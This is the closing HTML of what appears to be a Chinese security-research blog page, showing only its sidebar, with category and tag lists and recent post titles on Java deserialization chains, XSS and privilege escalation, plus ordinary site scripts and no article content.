class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">基础</a> <a href="/tags/%E5%85%8D%E6%9D%80/" style="font-size: 15px;">免杀</a> <a href="/tags/Java%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Java安全</a> <a href="/tags/Js%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Js安全</a> <a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">Java基础</a> <a href="/tags/PHP%E5%AE%89%E5%85%A8/" style="font-size: 15px;">PHP安全</a> <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">PHP代码审计</a> <a href="/tags/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/" style="font-size: 15px;">Java Web常见漏洞</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 15px;">靶场</a> <a href="/tags/linux%E6%8F%90%E6%9D%83/" style="font-size: 15px;">linux提权</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">代码审计</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 15px;">云安全</a> <a href="/tags/tools/" style="font-size: 15px;">tools</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 15px;">内网</a> <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" style="font-size: 15px;">权限提升</a> <a href="/tags/Win%E6%8F%90%E5%8D%87/" style="font-size: 15px;">Win提升</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/" style="font-size: 15px;">漏洞发现</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2025/09/12/CC%E9%93%BE5/">CC链5</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/08/CC%E9%93%BE4/">CC链4</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/07/CC%E9%93%BE3/">CC链3</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/04/Java-%E7%B1%BB%E5%8A%A0%E8%BD%BD/">Java类加载机制</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/03/CC%E9%93%BE6/">CC链6</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/02/CC%E9%93%BE2/">CC链2</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/02/CC%E9%93%BE1-LazyMap/">CC链1-LazyMap</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/01/CC%E9%93%BE1/">CC链1-TransformedMap</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/24/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">Java 反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/23/java%20Xss%E6%BC%8F%E6%B4%9E/">Java Xss漏洞</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"></div></div><script type="text/javascript" src="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=undefined" async></script><link rel="stylesheet" type="text/css" href="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.css"><link rel="stylesheet" type="text/css" href="/css/search.css?v=undefined"><script type="text/javascript" src="/js/search.js?v=undefined"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
  search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" color="0,0,0" opacity="0.5" zIndex="-2" count="50" src="https://unpkg.com/canvas-nest.js/dist/canvas-nest.js"></script><script type="text/javascript" src="/js/love.js?v=undefined"></script><script type="text/javascript" src="/js/copycode.js?v=undefined" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=undefined"><link rel="stylesheet" type="text/css" href="/css/external.css?v=undefined"><script type="text/javascript" src="/js/codeblock-resizer.js?v=undefined"></script><script type="text/javascript" src="/js/smartresize.js?v=undefined"></script></div></body></html>